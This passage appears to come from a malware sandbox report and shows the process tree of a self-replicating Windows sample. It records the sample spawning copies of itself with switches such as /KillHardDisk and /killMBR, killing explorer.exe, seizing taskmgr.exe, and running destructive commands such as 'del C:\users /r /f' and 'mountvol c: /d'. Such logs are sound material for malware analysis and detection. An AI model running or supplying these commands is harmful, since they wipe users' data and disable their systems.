        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:5928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:2020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+216548.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        8⤵
        
        PID:6984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:7012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        6⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        7⤵
        
        PID:8116
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killwindows 1698530834
        6⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killwindows 1698530834
        7⤵
        
        PID:6704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:3624
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:10280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /KillHardDisk 1698530834
        6⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /KillHardDisk 1698530834
        7⤵
        
        PID:7008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:6156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:6240
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:12072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killMBR 1698530834
        6⤵
        
        PID:9508
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killMBR 1698530834
        7⤵
        
        PID:11048
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:11840
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        
        PID:1064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        8⤵
        
        PID:4004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        6⤵
        
        PID:12616
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        7⤵
        
        PID:13132
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:7508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+56122.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
      4⤵
      PID:3324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe 1698530834
      4⤵
      PID:3848
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:4820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        6⤵
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+715282.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        8⤵
        
        PID:1992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe 1698530834
        8⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:6340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        10⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        11⤵
        
        PID:3128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killwindows 1698530834
        10⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killwindows 1698530834
        11⤵
        
        PID:4696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:8544
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:6264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:4416
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        13⤵
        
        PID:11740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /KillHardDisk 1698530834
        10⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /KillHardDisk 1698530834
        11⤵
        
        PID:6096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:9960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killMBR 1698530834
        10⤵
        
        PID:9672
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killMBR 1698530834
        11⤵
        
        PID:6832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /protect 1698530834
        10⤵
        
        PID:11780
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /protect 1698530834
        11⤵
        
        PID:2248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70579.exe
        12⤵
        
        PID:11908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        10⤵
        
        PID:12608
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        11⤵
        
        PID:13196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:7716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+529682.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        8⤵
        
        PID:6656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe 1698530834
        8⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:5456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /autoup 1698530834
        10⤵
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /autoup 1698530834
        11⤵
        
        PID:9068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /killwindows 1698530834
        10⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /killwindows 1698530834
        11⤵
        
        PID:2344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:7184
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:9428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /KillHardDisk 1698530834
        10⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /KillHardDisk 1698530834
        11⤵
        
        PID:8196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:8008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /killMBR 1698530834
        10⤵
        
        PID:9448
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /killMBR 1698530834
        11⤵
        
        PID:6760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /protect 1698530834
        10⤵
        
        PID:11720
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /protect 1698530834
        11⤵
        
        PID:5816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70559.exe
        12⤵
        
        PID:12480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /autoup 1698530834
        10⤵
        
        PID:12668
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7055.exe /autoup 1698530834
        11⤵
        
        PID:13244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /save 1698530834
        6⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        6⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+33488.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe
        8⤵
        
        PID:5068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe 1698530834
        8⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:7516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /autoup 1698530834
        10⤵
        
        PID:9456
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /autoup 1698530834
        11⤵
        
        PID:10948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /killwindows 1698530834
        10⤵
        
        PID:11708
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /killwindows 1698530834
        11⤵
        
        PID:10248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:13284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /KillHardDisk 1698530834
        10⤵
        
        PID:12708
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /KillHardDisk 1698530834
        11⤵
        
        PID:13164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:13756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7053.exe /killMBR 1698530834
        10⤵
        
        PID:7432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+216548.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe
        8⤵
        
        PID:7544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe 1698530834
        8⤵
        
        PID:9204
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe 1698530834
        9⤵
        
        PID:8584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:3328
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /autoup 1698530834
        10⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /autoup 1698530834
        11⤵
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /killwindows 1698530834
        10⤵
        
        PID:9500
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /killwindows 1698530834
        11⤵
        
        PID:11040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /KillHardDisk 1698530834
        10⤵
        
        PID:11772
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /KillHardDisk 1698530834
        11⤵
        
        PID:8324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:13516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /killMBR 1698530834
        10⤵
        
        PID:12676
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /killMBR 1698530834
        11⤵
        
        PID:13156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7052.exe /protect 1698530834
        10⤵
        
        PID:6396
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /save 1698530834
        6⤵
        
        PID:5724
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6564
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        6⤵
        
        PID:8632
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        7⤵
        
        PID:6884
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killwindows 1698530834
        6⤵
        
        PID:9084
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killwindows 1698530834
        7⤵
        
        PID:1048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:8076
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:9380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /KillHardDisk 1698530834
        6⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /KillHardDisk 1698530834
        7⤵
        
        PID:4288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:10112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:12240
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:11900
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killMBR 1698530834
        6⤵
        
        PID:9596
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killMBR 1698530834
        7⤵
        
        PID:6904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        6⤵
        
        PID:11692
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        7⤵
        
        PID:7428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7059.exe
        8⤵
        
        PID:12084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        6⤵
        
        PID:12540
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        7⤵
        
        PID:13092
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:11888
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7077.exe /protect 1698530834
    3⤵
